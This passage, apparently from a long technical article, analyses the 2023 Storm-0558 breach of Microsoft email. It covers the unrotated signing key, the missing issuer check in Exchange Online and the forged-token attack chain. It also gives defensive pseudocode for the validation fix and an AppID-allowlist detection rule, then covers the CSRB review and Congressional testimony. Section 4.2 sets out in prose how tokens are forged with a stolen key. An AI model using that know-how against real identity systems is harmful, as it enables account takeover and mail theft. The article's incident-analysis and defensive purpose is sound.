&lt;p&gt;The September 2018 decision was a developer-experience choice, not a security choice. Microsoft was responding to demand for unified consumer/enterprise app flows. The validation library it shipped &lt;em&gt;could&lt;/em&gt; check &lt;code&gt;iss&lt;/code&gt;, but the design left that decision to the caller -- under the (reasonable, at the time) assumption that each caller best understood which issuers should be acceptable for its resource. The flaw Storm-0558 exploited was not a bug in the library; it was a missing line in a caller five years later.&lt;/p&gt;
&lt;p&gt;The &lt;strong&gt;second decision&lt;/strong&gt;, in 2022, was that Microsoft&apos;s mail platform team migrated Outlook Web Access (OWA) and Exchange Online&apos;s token-validation code to consume that converged endpoint without adding the issuer and scope check the library expected callers to add.&lt;/p&gt;
&lt;p&gt;The exact verbatim language from Microsoft&apos;s September 6, 2023 retrospective is worth quoting: &quot;Developers in the mail system incorrectly assumed libraries performed complete validation and did not add the required issuer/scope validation. Thus, the mail system would accept a request for enterprise email using a security token signed with the consumer key&quot; [@msrc-key-acquisition]. Two systems, both built by Microsoft, with a shared interface contract that was undocumented at the precise boundary that mattered.&lt;/p&gt;
&lt;p&gt;The &lt;strong&gt;third precondition&lt;/strong&gt;, which is not strictly a 2018-or-2022 decision but rather a non-decision running through both, is that the 2016 MSA consumer signing key had never been rotated. The CSRB report is direct about why: &quot;Microsoft automated the key rotation process in the enterprise system with the intent for the consumer MSA system to follow and use the same technology, but it had not done so in the consumer MSA system before the intrusion&quot; [@csrb-report-2024].&lt;/p&gt;
&lt;p&gt;The MSA system had previously rotated keys manually. In 2021, the CSRB notes, Microsoft paused manual MSA rotation after a manual-rotation-related cloud outage, and the automated replacement never arrived. The 2016 key stayed live for seven years. Its certificate, per Wiz Research&apos;s recovery from public JWKS history, was issued April 5, 2016, and expired April 4, 2021 -- which means even after the certificate&apos;s nominal expiry, the underlying signing key was still accepted by the converged validator [@wiz-storm0558].&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; By 2022, the four preconditions for Storm-0558 were all in place. (1) An unrotated 2016 MSA consumer signing key. (2) Software-resident key custody (no HSM) for that key. (3) A 2018 converged metadata endpoint whose validation library left issuer/scope enforcement to callers. (4) A 2022 mail-platform migration onto that endpoint with the issuer/scope check missing. All that was needed was the attacker holding the key.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;These three (or four, counting the implicit software custody) factors did not align by accident. Each was an independent decision, made for an independent reason, by people working in good faith on different timelines. Developer ergonomics in 2018, mail-platform consolidation in 2022, a paused rotation process in 2021. None of them was a security decision. None of them was a vulnerability when shipped in isolation.&lt;/p&gt;
&lt;p&gt;The 2018 library would happily check &lt;code&gt;iss&lt;/code&gt; if the caller asked it to. The 2022 mail platform would happily reject a consumer-key-signed token if the integrator had added the check. The unrotated key would not have mattered if either of the validation layers had enforced separation. Storm-0558 required &lt;em&gt;all four&lt;/em&gt; to be wrong at once. They were.&lt;/p&gt;
&lt;h2&gt;4. The Attack Chain, Step by Step&lt;/h2&gt;
&lt;p&gt;The attack itself happened in five operational stages. The forged-token activity began May 15, 2023 and continued until Microsoft invalidated the stolen key on June 24, 2023, after the State Department&apos;s notification on June 16 [@ms-security-jul14; @csrb-report-2024]. Forty-one days.&lt;/p&gt;
&lt;p&gt;By the time the campaign was contained, Storm-0558 had been inside the cloud&apos;s identity infrastructure long enough to harvest tens of thousands of emails. What the attacker did is now mostly understood. What is not understood is &lt;em&gt;how&lt;/em&gt; the attacker got the key in the first place.&lt;/p&gt;

sequenceDiagram
    participant Atk as Storm-0558
    participant Key as 2016 MSA signing key
    participant MSA as MSA issuer infra
    participant OWA as OWA, Exchange Online
    participant Mbx as Target mailboxes
    Note over Atk,MSA: Mechanism unknown. Microsoft cannot determine how the key was obtained.
    MSA--&amp;gt;&amp;gt;Atk: 2016 MSA signing key, by May 2023
    Atk-&amp;gt;&amp;gt;Key: Forge OIDC JWT, kid for 2016 key
    Key-&amp;gt;&amp;gt;OWA: Token signed by MSA issuer, claims target enterprise user
    OWA-&amp;gt;&amp;gt;OWA: Verify signature, omit iss and aud check
    OWA-&amp;gt;&amp;gt;Mbx: Authorize as enterprise user
    Mbx--&amp;gt;&amp;gt;Atk: MailItemsAccessed events, 60,000 emails over 6 weeks
&lt;h3&gt;4.1 Key acquisition (mechanism unknown)&lt;/h3&gt;
&lt;p&gt;What is known is that by May 15, 2023, Storm-0558 held a valid 2016 MSA signing key. What is unknown -- and this is the most important sentence in the entire article -- is how the actor obtained it.&lt;/p&gt;
&lt;p&gt;Microsoft&apos;s September 6, 2023 retrospective offered a four-step hypothesis. A signing system crashed in April 2021. The crash generated a memory dump. The signing key was supposed to be redacted from such dumps, but a race condition allowed it through. The dump was supposed to remain inside an air-gapped production-isolated network but was migrated to the corporate debugging network. There, the credentials of a Microsoft engineer&apos;s account were compromised by an actor consistent with Storm-0558&apos;s tradecraft, and the dump was exfiltrated.&lt;/p&gt;
&lt;p&gt;That was the September 2023 story.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Microsoft updated its September 6, 2023 retrospective on March 12, 2024 to add the following: &quot;The blog below states that the actor access may have resulted from a crash dump in 2021, but we have not found a crash dump containing the impacted key material&quot; [@msrc-key-acquisition; @msrc-key-acquisition-archive]. The artifact (crash dump containing the key) was not found. The general shape of the hypothesis -- operational error plus compromised engineering account -- is retained as the &lt;em&gt;leading&lt;/em&gt; hypothesis (see the immediately-following PullQuote for Microsoft&apos;s verbatim framing of what survives the retraction), not as a confirmed mechanism.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Three weeks after that retraction, the Cyber Safety Review Board published its report. The CSRB&apos;s finality on the question is uncompromising: Microsoft &quot;has been unable to determine how or when Storm-0558 obtained the MSA key&quot; [@csrb-report-2024]. The Board&apos;s investigation, which ran for seven months and drew on interviews with Microsoft engineers, the State Department, CISA, and independent reviewers, did not yield a confirmed mechanism. It identified candidate paths -- crash-dump migration, debugging-environment access, a compromised engineering account -- but found no artifact that closed any of them.&lt;/p&gt;
&lt;p&gt;The epistemic shape of this finding deserves naming. Three years on, the cloud provider responsible for authenticating billions of users cannot publicly tell its customers how the most security-critical secret in its consumer identity stack was stolen.&lt;/p&gt;
&lt;p&gt;That is not a minor footnote. As we will see in Section 7, it shapes Microsoft&apos;s entire architectural response: every Secure Future Initiative commitment about hardware-backed key custody, automatic rotation, and confidential signing has to defeat &lt;em&gt;plausible&lt;/em&gt; mechanisms because the actual one cannot be enumerated.&lt;/p&gt;

Our leading hypothesis remains that operational errors resulted in key material leaving the secure token signing environment that was subsequently accessed in a debugging environment via a compromised engineering account. -- Microsoft Security Response Center, March 12, 2024 update to the September 6, 2023 Storm-0558 retrospective [@msrc-key-acquisition]
&lt;h3&gt;4.2 Token forgery&lt;/h3&gt;
&lt;p&gt;With the private key in hand, forging an OpenID Connect access token is mechanical. The header names the algorithm Microsoft uses (RS256, RSASSA-PKCS1-v1_5 with a SHA-256 hash, in this case) and the &lt;code&gt;kid&lt;/code&gt; of the 2016 key. The payload claims identify the target user (&lt;code&gt;sub&lt;/code&gt;), the target tenant where applicable, the requested audience (Exchange Online&apos;s resource URI), and validity timestamps.&lt;/p&gt;
&lt;p&gt;The actor signs the header-and-payload with the stolen private key, Base64URL-encodes the three parts, and joins them with periods. The result is a valid JWT, indistinguishable from one Microsoft itself would mint. Why? Because the cryptographic verification any relying party performs is, by construction, &quot;does this signature decrypt with the public key whose &lt;code&gt;kid&lt;/code&gt; is named in the header?&quot;&lt;/p&gt;
&lt;p&gt;Storm-0558 forged tokens against both the legitimate MSA scope (Outlook.com mailboxes belonging to consumer accounts -- the &lt;em&gt;intended&lt;/em&gt; use of the 2016 key) and the illegitimate cross-tier scope (enterprise Exchange Online mailboxes belonging to organizations like the U.S. State Department, which were never the intended audience for an MSA-signed token). The legitimacy of the signature did not change between the two. The difference was on the relying-party side.&lt;/p&gt;
&lt;h3&gt;4.3 The cross-tier validation flaw&lt;/h3&gt;
&lt;p&gt;This is the bug. The OWA and Exchange Online code path that received an incoming token, parsed the header, fetched the public key from the converged metadata endpoint, and verified the signature did not, after a successful signature verification, separately enforce that the token&apos;s &lt;code&gt;iss&lt;/code&gt; claim matched an issuer authorized for enterprise email.&lt;/p&gt;
&lt;p&gt;The shared validation library was perfectly capable of performing the issuer check, but only if asked. The OWA/Exchange Online caller did not ask.&lt;/p&gt;

A v2.0 MSA token&apos;s `iss` claim is `https://login.microsoftonline.com/9188040d-6c67-4c5b-b112-36a304b66dad/v2.0` -- the MSA &quot;consumers&quot; tenant on the shared `login.microsoftonline.com` host, with the well-known consumers tenant GUID [@msa-oidc-discovery]. A v2.0 Entra ID token&apos;s `iss` claim is `https://login.microsoftonline.com/{enterprise-tenant-GUID}/v2.0`, with the enterprise customer&apos;s own tenant GUID. The cross-tier distinction is tenant-GUID-vs-tenant-GUID *inside the same URL template*, not domain-vs-domain.&lt;p&gt;These are different issuers, with different signing keys and intended audiences. An enterprise resource like a State Department mailbox should accept only the second form, scoped to the State Department&apos;s tenant. Storm-0558&apos;s forged tokens presented the first form (the MSA &quot;consumers&quot; &lt;code&gt;iss&lt;/code&gt;) for resources that should have accepted only the second. The validator did not notice the mismatch because it never read past the signature verification step.&lt;/p&gt;
&lt;p&gt;The fix is one explicit &lt;code&gt;iss&lt;/code&gt;/&lt;code&gt;aud&lt;/code&gt; check on the relying-party side -- the joint mandate RFC 8725 Sections 3.8 and 3.9 have made mandatory since February 2020 (Section 3.8 covers &lt;code&gt;iss&lt;/code&gt; and &lt;code&gt;sub&lt;/code&gt;; Section 3.9 covers &lt;code&gt;aud&lt;/code&gt;) [@rfc-8725; @rfc-8725-html].
&lt;/p&gt;&lt;p&gt;&lt;/p&gt;
&lt;p&gt;The fix Microsoft eventually shipped is described in its own September 6, 2023 retrospective with the verbatim line &quot;this issue has been corrected using the updated libraries&quot; [@msrc-key-acquisition].&lt;/p&gt;
&lt;p&gt;Wiz Research, looking at the same flaw from outside, framed the architectural consequence. The actor&apos;s compromised key &quot;could have theoretically used the private key it acquired to forge tokens to authenticate as any user to any affected application that trusts Microsoft OpenID v2.0 mixed audience and personal-accounts certificates&quot; [@wiz-storm0558]. The actual exploitation was scoped to email, but the addressable scope was larger.&lt;/p&gt;

The private key an identity provider uses to sign authentication tokens it issues. Whoever holds the signing key can mint tokens cryptographically indistinguishable from those issued by the legitimate provider. The security of the identity system, in the absence of independent issuer/scope/tenant validation on the relying-party side, depends entirely on the custody of this key. The CSRB report describes its compromise as the central enabler of Storm-0558 [@csrb-report-2024].

The check, performed by a JWT relying party after signature verification, that the token&apos;s `iss` claim matches a permitted issuer for the requested resource and the `aud` claim matches the resource&apos;s identifier. RFC 8725 codifies the combined obligation across two adjacent sub-sections: Section 3.8 (&quot;Validate Issuer and Subject&quot;) makes `iss` and `sub` validation mandatory, and Section 3.9 (&quot;Use and Validate Audience&quot;) makes `aud` validation mandatory [@rfc-8725; @rfc-8725-html]. Skipping either -- as the OWA/Exchange Online path did before mid-2023 -- collapses the security model to &quot;any signature from any issuer the validator knows about is acceptable for any resource.&quot;
&lt;p&gt;The function name &lt;code&gt;GetAccessTokenForResource&lt;/code&gt; has been widely repeated across secondary coverage of Storm-0558 as the locus of the validation flaw. The name does not appear in any of the four primary sources: Microsoft&apos;s July 14, 2023 analysis, the September 6, 2023 retrospective, the CSRB report PDF, or the Wiz Research post. This article therefore describes the flaw functionally, as Microsoft itself did, without naming the function symbol [@msrc-key-acquisition; @csrb-report-2024; @wiz-storm0558].&lt;/p&gt;
&lt;p&gt;The single missing check the OWA path needed to make -- and now does -- is mechanical. In pseudocode, the difference is exactly one if-statement:&lt;/p&gt;
&lt;p&gt;{`
// Pseudocode. Pre-2023 OWA path did the first two steps and skipped the third.&lt;/p&gt;
&lt;p&gt;function verifyEnterpriseToken(jwt, tenantId, resource) {
  const header = parseJwtHeader(jwt);
  const payload = parseJwtPayload(jwt);&lt;/p&gt;
&lt;p&gt;  const issuerJwks = fetchJwks(payload.iss);
  const key = issuerJwks.find(k =&amp;gt; k.kid === header.kid);
  if (!key) throw new Error(&apos;unknown kid&apos;);&lt;/p&gt;
&lt;p&gt;  if (!verifySignature(jwt, key)) throw new Error(&apos;bad signature&apos;);&lt;/p&gt;
&lt;p&gt;  // The missing steps. RFC 8725 Sections 3.8 and 3.9 require both.
  const allowedIssuer = &apos;https:&apos; + &apos;//login.microsoftonline.com/&apos; + tenantId + &apos;/v2.0&apos;;
  if (payload.iss !== allowedIssuer) {
    throw new Error(&apos;issuer not authorized for this enterprise tenant&apos;);
  }
  if (payload.aud !== resource) {
    throw new Error(&apos;audience does not match resource&apos;);
  }&lt;/p&gt;
&lt;p&gt;  return payload;
}&lt;/p&gt;
&lt;p&gt;// Storm-0558&apos;s forged token carried payload.iss = &apos;https:&apos; + &apos;//login.microsoftonline.com/9188040d-6c67-4c5b-b112-36a304b66dad/v2.0&apos;
// (the MSA consumers tenant). kid: a 2016 MSA key. Signature: valid. Issuer match: never checked.
`}&lt;/p&gt;
&lt;h3&gt;4.4 Mailbox access and exfiltration&lt;/h3&gt;
&lt;p&gt;With validated tokens, the actor authenticated to Outlook Web Access and to Exchange Web Services as the target enterprise users. Once authenticated, the activity looked like any other authenticated user session: enumerate folders, fetch messages, read attachments.&lt;/p&gt;
&lt;p&gt;Storm-0558 selected high-value targets. The CSRB final tally is, again, approximately 60,000 emails from State Department accounts; 22 enterprise organizations in total; approximately 503 related personal accounts [@csrb-report-2024]. Named individual victims publicly include U.S. Commerce Secretary Gina Raimondo, U.S. Ambassador to China Nicholas Burns, and U.S. House of Representatives accounts including Congressman Don Bacon (R-NE), who confirmed in August 2023 that the FBI had notified him his personal and campaign email accounts were among those compromised [@csrb-report-2024].&lt;/p&gt;
&lt;p&gt;The campaign ran during what Microsoft characterized as China Standard Time business hours, with a working-hours heat-map pattern visible in the telemetry [@ms-security-jul14]. The duration was at least six weeks of active access: from the attacker&apos;s earliest documented activity on May 15, 2023 until Microsoft invalidated the stolen key on June 24, 2023, eight days after the State Department&apos;s June 16 notification.&lt;/p&gt;
&lt;h3&gt;4.5 The broader blast radius (potential, not exploited)&lt;/h3&gt;
&lt;p&gt;Wiz Research&apos;s independent analysis published in mid-2023 made an argument the world had not yet absorbed. The &lt;em&gt;same&lt;/em&gt; 2016 MSA signing key could in principle have signed OpenID v2.0 tokens for many more Microsoft services than just email. The Wiz authors enumerated SharePoint, Teams, OneDrive, and any third-party multi-tenant application supporting &quot;Sign in with Microsoft&quot; with mixed-audience personal-account acceptance [@wiz-storm0558].&lt;/p&gt;
&lt;p&gt;The framing they wrote -- &quot;if a signing key for Google, Facebook, Okta or any other major identity provider leaks, the implications are hard to comprehend&quot; -- is the right framing [@wiz-storm0558].&lt;/p&gt;
&lt;p&gt;There is no public evidence that Storm-0558 exploited the broader scope. The breach the world saw is the breach Microsoft and CISA found by enumerating one specific service&apos;s logs. Whether the broader scope was exploited and not detected is, as we will note in Section 10, an unanswered question.&lt;/p&gt;
&lt;p&gt;Six weeks of access. Approximately 60,000 State Department emails. The cloud provider did not notice. So who &lt;em&gt;did&lt;/em&gt; notice, and how?&lt;/p&gt;
&lt;h2&gt;5. Why a Paying Customer, Not Microsoft, Caught It&lt;/h2&gt;
&lt;p&gt;On June 15, 2023, the State Department SOC analyst who first noticed Storm-0558 was performing routine threat-hunting against Microsoft 365 Purview audit logs. The specific event type that surfaced the anomaly was &lt;code&gt;MailItemsAccessed&lt;/code&gt;, an audit record that fires whenever a mailbox item is read or fetched. It captures who read it (&lt;code&gt;UserId&lt;/code&gt;), from where (&lt;code&gt;ClientIPAddress&lt;/code&gt;), with what application (&lt;code&gt;ClientAppID&lt;/code&gt;, &lt;code&gt;AppID&lt;/code&gt;), and against which item (&lt;code&gt;InternetMessageId&lt;/code&gt; and folder).&lt;/p&gt;
&lt;p&gt;The detection technique was a baseline-deviation check. The State Department maintained a list of legitimate &lt;code&gt;(ClientAppID, AppID)&lt;/code&gt; pairs that historically read mailboxes belonging to its employees. Storm-0558&apos;s forged-token sessions presented &lt;code&gt;AppID&lt;/code&gt; values that were not on the list.&lt;/p&gt;
&lt;p&gt;Two days later, CISA and the FBI published joint advisory AA23-193A formalizing what the State Department had done into a recommended detection methodology. The verbatim language in the advisory: &quot;In Mid-June 2023, an FCEB agency observed &lt;code&gt;MailItemsAccessed&lt;/code&gt; events with an unexpected &lt;code&gt;ClientAppID&lt;/code&gt; and &lt;code&gt;AppID&lt;/code&gt; in M365 Audit Logs. ... The affected FCEB agency identified suspicious activity by leveraging enhanced logging -- specifically of &lt;code&gt;MailItemsAccessed&lt;/code&gt; events -- and an established baseline of normal Outlook activity (e.g., expected &lt;code&gt;AppID&lt;/code&gt;). The &lt;code&gt;MailItemsAccessed&lt;/code&gt; event enables detection of otherwise difficult to detect adversarial activity&quot; [@aa23-193a; @aa23-193a-pdf].&lt;/p&gt;

A Microsoft 365 audit event that records every read or fetch operation against a mailbox item. The event captures the user, source IP, client and application IDs, and the message identifier accessed. Because forged-token sessions necessarily use an `AppID` outside an organization&apos;s normal application inventory, `MailItemsAccessed` is the highest-signal event class for detecting mailbox-token abuse [@aa23-193a].

A Microsoft 365 audit-log tier that, pre-July 2023, gated several high-value security event classes (including `MailItemsAccessed`) behind a paid add-on. Most federal civilian agencies and many commercial tenants were on Purview Audit (Standard) and did not collect these events. The State Department had paid for Premium and was therefore in a position to detect Storm-0558 from its own telemetry [@aa23-193a; @ms-blog-jul19-recovered].

flowchart TD
    A[&quot;June 15, 2023: State Department SOC analyst&lt;br /&gt;notices unfamiliar ClientAppID in MailItemsAccessed events&quot;] --&amp;gt; B[&quot;June 16, 2023: State Department notifies Microsoft&quot;]
    B --&amp;gt; C[&quot;Microsoft compares kid against published MSA&lt;br /&gt;key rotation history, identifies 2016 key&quot;]
    C --&amp;gt; D[&quot;July 11, 2023: Microsoft public disclosure post&quot;]
    D --&amp;gt; E[&quot;July 12, 2023: CISA and FBI publish AA23-193A&quot;]
    E --&amp;gt; F[&quot;July 19, 2023: Microsoft expands free Purview Audit features&quot;]
    E --&amp;gt; G[&quot;July 27, 2023: Wyden letter to DOJ, FTC, CISA&quot;]
    G --&amp;gt; H[&quot;August 11, 2023: DHS announces CSRB cloud review&quot;]
&lt;p&gt;Microsoft&apos;s &lt;em&gt;confirmation&lt;/em&gt; step came after the State Department&apos;s notification, not before. Once notified, Microsoft compared the &lt;code&gt;kid&lt;/code&gt; on the suspicious tokens against its own published MSA key rotation history and found that the &lt;code&gt;kid&lt;/code&gt; corresponded to a 2016 key whose certificate had expired April 4, 2021 [@wiz-storm0558; @ms-security-jul14]. The signature was cryptographically valid for the 2016 key. The 2016 key should never have signed an enterprise-tier token. Both halves of that statement were true at the same time, and the second half is what told Microsoft this was a key compromise rather than a stolen-credential issue.&lt;/p&gt;
&lt;p&gt;The structural fact about this detection -- the one that puts every other event in this article in its proper context -- is that &lt;code&gt;MailItemsAccessed&lt;/code&gt; was, pre-incident, a Purview Audit (Premium) tier feature [@aa23-193a]. The State Department had paid for Premium. Most federal civilian agencies and many commercial tenants had not. If the State Department had been on Purview Audit (Standard), the event class that surfaced Storm-0558 would not have been collected at all, and the breach would have run longer and gone wider before anyone noticed. The CSRB report makes this connection explicit: the structural critique that follows in Section 6 is not about one bug or one missing check. It is about the commercial logging-tier structure of cloud identity, and about who is in a position to detect a CSP-level compromise when the CSP itself is not [@csrb-report-2024].&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; The cloud provider did not catch the breach. A paying customer did, on routine threat-hunting against an audit log the customer had to pay extra to collect. This is the CSRB&apos;s harshest single critique, and it is what motivated Microsoft&apos;s policy response on July 19, 2023 -- making key Purview Audit (Premium) features, including &lt;code&gt;MailItemsAccessed&lt;/code&gt;, free for FCEB customers and most commercial customers [@ms-blog-jul19-recovered; @cisa-statement-free-logs-fixed; @csrb-report-2024].&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The detection methodology the State Department used is reproducible in pseudocode. The logic, after audit-log ingestion into a SIEM, is small.&lt;/p&gt;
&lt;p&gt;{`
// Pseudocode. Assumes MailItemsAccessed events ingested from M365 Purview audit log.
// The State Department&apos;s pattern: maintain a small allowlist of legitimate AppIDs.&lt;/p&gt;
&lt;p&gt;const allowlistedAppIds = new Set([
  // populated from your tenant&apos;s historical baseline of legitimate mail clients,
  // approved third-party connectors, M365 services, and authorized integrations
  &apos;00000003-0000-0000-c000-000000000000&apos;, // Microsoft Graph
  // ... extend with your tenant&apos;s specific approved AppIDs
]);&lt;/p&gt;
&lt;p&gt;function analyzeEvent(evt) {
  if (evt.Operation !== &apos;MailItemsAccessed&apos;) return;
  if (allowlistedAppIds.has(evt.AppId)) return;&lt;/p&gt;
&lt;p&gt;  // Forged-token sessions necessarily present an AppID outside the baseline.
  alert({
    severity: &apos;high&apos;,
    reason: &apos;MailItemsAccessed from unallowlisted AppID&apos;,
    user: evt.UserId,
    appId: evt.AppId,
    clientAppId: evt.ClientAppId,
    sourceIp: evt.ClientIPAddress,
    messageId: evt.InternetMessageId
  });
}
`}&lt;/p&gt;
&lt;p&gt;The State Department SOC analyst who first identified Storm-0558 has not been publicly named in any primary source. The CSRB report describes the detection at the level of the agency. There is good reason for the anonymity, given the operational profile of someone who is, by chance and skill, the first known human to detect a Chinese state-affiliated forgery of a Microsoft signing key.&lt;/p&gt;
&lt;p&gt;Microsoft&apos;s policy response was rapid and substantive. On July 19, 2023, the Microsoft Security blog announced the expansion. Purview Audit (Standard) customers would get &quot;more than 30 other types of log data previously only available at the Microsoft Purview Audit (Premium) subscription level,&quot; with default retention extended from 90 to 180 days, rolling out beginning September 2023 [@ms-blog-jul19-recovered]. CISA&apos;s same-day press release confirmed: &quot;Microsoft customers will now have access to expanded cloud logging capabilities at no additional charge ... these additional logging capabilities will now be available at no extra cost to federal government customers and Microsoft commercial customers beginning in September&quot; [@cisa-statement-free-logs-fixed].&lt;/p&gt;
&lt;p&gt;The pricing structure that had made the State Department&apos;s detection possible only because the State Department paid extra was, eight days after the joint advisory, made part of the baseline.&lt;/p&gt;
&lt;p&gt;That is the operational story. But the political story was just starting. On July 27, 2023, Senator Ron Wyden (D-OR) wrote a four-page letter to three federal agencies asking them to investigate Microsoft. Fifteen days later, the Cyber Safety Review Board announced its third-ever review.&lt;/p&gt;
&lt;h2&gt;6. The Public Reckoning -- CSRB, Retracted Hypothesis, Congressional Testimony&lt;/h2&gt;
&lt;p&gt;Senator Wyden&apos;s letter, addressed to Attorney General Merrick Garland, FTC Chair Lina Khan, and CISA Director Jen Easterly, opened with a comparison: &quot;Microsoft never took responsibility for its role in the SolarWinds hacking campaign&quot; [@wyden-senate-pr; @wyden-senate-letter-pdf]. The letter then enumerated four specific cybersecurity failures it attributed to Microsoft in the Storm-0558 incident.&lt;/p&gt;
&lt;p&gt;Quoting Wyden&apos;s own characterization from the Senate press release: &quot;Employing a single encryption key that could be used to forge access to consumer, commercial and government customers&apos; private communications; Microsoft&apos;s blog post about the hack suggests it did not store high-value encryption keys in a Hardware Security Module ...; Using an encryption key that was valid for 5 years, and was still accepted by Microsoft&apos;s software, even though it had expired in 2021, two years before the hack ...; Neither internal nor external security audits detected the security weaknesses that enabled the hack&quot; [@wyden-senate-pr].&lt;/p&gt;

The (d) to (e) jump in the political chronology -- from Wyden&apos;s July 27 letter to the August 11 DHS announcement -- is, in Wyden&apos;s own words, causal. His August 11 statement reads: &quot;I applaud President Biden and CISA Director Easterly for acting on my request for the board to review this recent espionage campaign, including cybersecurity negligence by Microsoft that enabled it ... Had the board studied the 2020 SolarWinds hack, as President Biden originally directed, its findings might have been able to shore up federal cybersecurity in time to stop hackers from exploiting a similar vulnerability in the most recent incident&quot; [@wyden-senate-statement-aug11]. The Senate office&apos;s published causal-chain framing matters because it provides the public-record bridge from a single senator&apos;s letter to a federal advisory-board review.
&lt;h3&gt;6.1 The CSRB&apos;s authority and process&lt;/h3&gt;
&lt;p&gt;The Cyber Safety Review Board exists because President Biden&apos;s Executive Order 14028 of May 12, 2021, &quot;Improving the Nation&apos;s Cybersecurity,&quot; directed DHS to establish a standing board to conduct after-action reviews of significant cyber incidents [@eo-14028]. Storm-0558 was the Board&apos;s third review, after Log4j and Lapsus$ [@csrb-program].&lt;/p&gt;
&lt;p&gt;On August 11, 2023, DHS Secretary Alejandro Mayorkas announced the Board would conduct a review of &quot;the malicious targeting of cloud computing environments,&quot; with the recent Microsoft Exchange Online intrusion as the central case study and a broader scope covering &quot;issues relating to cloud-based identity and authentication infrastructure affecting applicable CSPs and their customers&quot; [@dhs-csrb-announce-archive]. Robert Silvers, DHS Under Secretary for Policy, chaired. Dmitri Alperovitch served as Acting Deputy Chair for this review [@dhs-csrb-report-release].&lt;/p&gt;

A public-private federal advisory board established by Executive Order 14028 (May 12, 2021) and standing up in February 2022 to conduct after-action reviews of significant cyber incidents and recommend improvements. The Board&apos;s Storm-0558 review, its third (after Log4j and Lapsus$), was announced August 11, 2023 and reported April 2, 2024 [@eo-14028; @csrb-program; @csrb-report-2024].
&lt;h3&gt;6.2 The September 2023 hypothesis and the March 2024 retraction&lt;/h3&gt;
&lt;p&gt;The chronology that matters here is short and worth pinning down precisely. Microsoft published the crash-dump hypothesis on September 6, 2023 [@msrc-key-acquisition]. Microsoft &lt;em&gt;itself&lt;/em&gt; updated that post on March 12, 2024 with the retraction-of-the-artifact paragraph quoted earlier in Section 4.1 [@msrc-key-acquisition]. The CSRB report published April 2, 2024 -- three weeks after Microsoft retracted the artifact -- then documented the resulting state of knowledge (verdict quoted in Section 4.1; CSRB page 17) [@csrb-report-2024].&lt;/p&gt;
&lt;p&gt;The order matters. Microsoft retracted the artifact first. The CSRB did not force the retraction; it documented the resulting state of knowledge. That sequence is meaningful because it suggests Microsoft&apos;s own forensic work, not external pressure, drove the walking-back of the artifact claim.&lt;/p&gt;
&lt;h3&gt;6.3 The CSRB&apos;s findings&lt;/h3&gt;
&lt;p&gt;The Board&apos;s findings, in its own verbatim language, are direct. The Board&apos;s page-ii verbatim -- the preventable / inadequate / requires-an-overhaul language quoted in Section 1&apos;s opening PullQuote -- sets the frame; page 17 sharpens it: &quot;the cascade of Microsoft&apos;s avoidable errors that allowed this intrusion to succeed&quot; [@csrb-report-2024].&lt;/p&gt;
&lt;p&gt;The DHS press release surfaced these findings on the day of publication: &quot;the intrusion by Storm-0558, a hacking group assessed to be affiliated with the People&apos;s Republic of China, was preventable. It identified a series of Microsoft operational and strategic decisions that collectively pointed to a corporate culture that deprioritized enterprise security investments and rigorous risk management&quot; [@dhs-csrb-report-release].&lt;/p&gt;
&lt;p&gt;The report makes 25 recommendations. Of those, 16 apply to Microsoft (4 specific to Microsoft and 12 to all cloud service providers but accepted by Microsoft per Brad Smith&apos;s June 2024 testimony) [@brad-smith-2024-06-13]. The structural critique embedded in the recommendations is that the &lt;em&gt;commercial logging-tier structure&lt;/em&gt; of cloud identity is itself a security problem, because it delays detection asymmetrically: richly-resourced customers detect compromise; less-resourced customers do not. The free-Purview-Audit shift Microsoft had announced on July 19, 2023 is, in the CSRB&apos;s framing, a necessary but not sufficient condition for cloud-identity log access to stop being a per-customer commercial decision.&lt;/p&gt;
&lt;h3&gt;6.4 Brad Smith&apos;s June 13, 2024 testimony&lt;/h3&gt;
&lt;p&gt;The House Committee on Homeland Security titled its June 13, 2024 hearing &quot;A Cascade of Security Failures: Assessing Microsoft Corporation&apos;s Cybersecurity Shortfalls and the Implications for Homeland Security&quot; [@homeland-hearing]. The plural &quot;Failures&quot; was a deliberate framing choice. By the time of the hearing, Microsoft had also publicly disclosed a separate January 2024 intrusion by Midnight Blizzard (the Russian SVR; the same actor as SolarWinds), and the hearing&apos;s scope spanned both incidents. Brad Smith, Microsoft&apos;s Vice Chair and President, was the witness.&lt;/p&gt;
&lt;p&gt;Smith&apos;s written and oral testimony opened with the soundbite that defined the hearing&apos;s coverage (quoted in the PullQuote below). Smith confirmed Microsoft&apos;s acceptance of all 16 applicable CSRB recommendations, identified 18 additional internal objectives beyond the CSRB&apos;s scope, and announced that Senior Leadership Team compensation would be tied in part to progress on the Secure Future Initiative [@brad-smith-2024-06-13; @sfi-may-2024].&lt;/p&gt;

Microsoft accepts responsibility for each and every one of the issues cited in the CSRB&apos;s report. Without equivocation or hesitation. And without any sense of defensiveness. -- Brad Smith, Vice Chair and President of Microsoft, written testimony to the House Committee on Homeland Security, June 13, 2024 [@brad-smith-2024-06-13; @smith-testimony-pdf]
&lt;p&gt;The hearing&apos;s plural framing -- &quot;Failures&quot; -- mattered. On January 19, 2024, Microsoft disclosed a separate Midnight Blizzard intrusion that had begun in late November 2023 (approximately four weeks after the November 2, 2023 launch of the Secure Future Initiative) via a password spray against a legacy non-production test tenant, and that exfiltrated email from members of Microsoft&apos;s senior leadership team [@msrc-midnight-blizzard-jan-archive]. The March 8, 2024 update added that Midnight Blizzard had reached Microsoft source code repositories and ramped February password sprays to ten times the January volume [@msrc-midnight-blizzard-mar-archive]. By the June hearing, Microsoft was carrying both incidents into the same line of questioning.&lt;/p&gt;
&lt;p&gt;Microsoft accepted responsibility. The CSRB asked for an architectural overhaul. The next question is what Microsoft actually built.&lt;/p&gt;
&lt;h2&gt;7. The Architectural Response -- SFI and the Identity-Plane Re-Architecture&lt;/h2&gt;
&lt;p&gt;The Secure Future Initiative (SFI) is the corporate vehicle through which Microsoft&apos;s post-Storm-0558 architectural changes are reported. The remarkable property of the SFI commitments, viewed against the pre-incident architecture described in Section 3, is that they are surgically targeted: each of the four ways the pre-incident MSA system failed maps to one explicit commitment.&lt;/p&gt;
